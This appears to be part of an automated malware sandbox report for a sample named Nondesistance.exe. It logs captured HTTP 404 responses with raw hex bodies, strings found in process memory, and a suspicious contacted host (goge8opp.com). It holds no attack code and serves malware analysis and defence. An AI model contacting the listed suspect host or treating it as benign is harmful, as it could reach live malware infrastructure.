        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:36:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: brData Raw: 38 66 0d 0a a1 18 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 74 b3 81 0d 70 38 8c e7 3c 7c ae 4d 8a b1 2b e9 23 92 66 62 94 5d 6a 81 70 41 5a e9 a1 67 c0 a8 71 7b 56 69 d3 a5 0c 31 7d 73 14 43 d3 56 5c 79 30 3f d7 8b 6c 17 21 bc 41 60 04 c4 f7 0f 3a cc b7 68 b1 45 38 e3 2e e6 27 9e 1b 2b ef 8d 1b 2b 13 e2 43 2e 7b 1d e2 6a 7c 9e e0 6a 29 ff fe 8d db fd 03 d9 8a 5f 2f 90 17 94 48 3f b0 81 6a 22 cd 86 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 8f [(slytEa$tp8<|M+#fb]jpAZgq{Vi1}sCV\y0?l!A`:hE8.'++C.{j|j)_/H?j"0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:36:57 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=zPvOw6oaeNZcJ75G881l; Domain=.academynadpo.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:37:02 GMTDate: Mon, 27 May 2024 10:37:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=K5CgOExyh7s2WfkrXWiR; Domain=.academynadpo.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:37:05 GMTDate: Mon, 27 May 2024 10:37:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=OodH06pAccMziIHJU52H; Domain=.academynadpo.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:37:08 GMTDate: Mon, 27 May 2024 10:37:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=LQ7ncvyPuVQcyFyOew5a; Domain=.academynadpo.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:37:10 GMTDate: Mon, 27 May 2024 10:37:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 738Last-Modified: Sun, 11 Jun 2023 21:19:31 GMTETag: "2e2-5fde1286ba692"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 32 30 22 20 68 65 69 67 68 74 3d 22 38 38 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:37:36 GMTServer: ApacheX-SERVER: 3908Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:38:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=1vdklb6ta12o9p8t3rtq5b1n4n; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheData Raw: 61 31 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 69 74 22 3e 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 32 64 2f 32 64 69 2f 32 64 69 76 33 68 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 61 6e 79 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 30 37 2f 30 37 66 2f 30 37 66 7a 71 38 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 
22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:38:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:38:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:38:55 GMTServer: ApacheX-SERVER: 3908Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:39:05 GMTServer: ApacheX-SERVER: 3908Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>
        Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000777E000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000697E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://goge8opp.com:301
        Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
        Source: unknown HTTPS traffic detected: 142.251.16.101:443 -> 192.168.11.30:49827 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 172.253.62.132:443 -> 192.168.11.30:49828 version: TLS 1.2
